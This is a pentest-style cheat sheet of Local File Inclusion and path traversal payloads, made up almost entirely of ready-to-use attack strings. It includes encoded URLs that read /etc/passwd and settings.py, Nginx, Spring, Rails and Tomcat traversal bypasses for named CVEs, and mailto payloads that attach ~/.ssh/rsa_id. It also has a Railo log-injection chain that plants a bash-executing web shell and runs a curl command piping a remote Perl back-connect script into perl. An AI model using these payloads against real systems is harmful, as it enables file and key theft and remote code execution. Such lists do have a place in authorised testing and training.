Local File Inclusion - Documentation

Link to this headingLFI (Local File Inclusion)

Link to this headingPayloads

https://ac331fc21e54319d80214e2200bf00e6.web-security-academy.net/image?filename=....//....//....//etc/passwd
https://ac4e1f341f197cda8051248900f6006d.web-security-academy.net/image?filename=..%252f..%252f..%252f..%252fetc%2fpasswd
https://ac671fa41f1739d7804a4fc7004e001f.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg

Link to this headingPolyglot URL path:

|---linux url----| new URL("file:///etc/passwd?/../../Windows/win.ini") |-------windows unc---------------|

Rely on getPath() under Windows:

URL base = new URL("file:///C:/Windows/temp/"); URL url = new URL(base, "file?/../../win.ini");

Rely on normalization of getFile() or toExternalForm() under Linux:

URL base = new URL("file:///tmp/"); URL url = new URL(base, "../etc/passwd?/../../tmp/file");

Link to this headingNginx

Link to this headingOff by slash

When using the configuration below it is possible to use LFI to access secret files and folders.

location /static { alias /home/app/static/; }

This loads the file from /home/app/settings.py

http://127.0.0.1/static../settings.py

Finding the problem:

HTTP Code	URL
200	http://target/assets/app.js
403	http://target/assets/
404	http://target/assets/../settings.py
403	http://target/assets../
200	http://target/assets../static/app.js
200	http://target/assets../settings.py

Link to this headingRuby

Link to this headingGrails

..\Q/\E = ../

Link to this headingRailo admin console

Get to admin console with https://login.getbynder.com/..;/railo-context/admin/web.cfm
Change 404 error page to /railo-context/../logs/exception.log
Make request

https://login.getbynder.com/..;/railo-context/<cfoutput> <cfexecute name='/bin/bash' arguments='#Form.shell#' timeout='10' variable='output'> </cfexecute>#output#</cfoutput>.cfm

View 404 error page that is parsed with the new log injection.

curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'

Link to this headingCVE-2018-3760

Attack URLs:

http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/etc/passwd http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain

Link to this headingSpring

Link to this headingCVE-2018-1271

Attack URL:

http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini

Input and Output:

Input	cleanPath	Filesystem
/foo/../	/	/
/foo/../../	/../	/../
/foo//../	/foo/	/
/foo///../../	/foo/	/../
/foo////../../../	/foo/	/../../

Link to this headingTomcat

Parent Directory:

http://example.com/portal/..;/manager/html

Link to this headingMailTo

Payloads:

mailto:[email protected]?attach=imap:///fetch>UID>/INBOX>1 mailto:[email protected]?attach=~/.ssh/rsa_id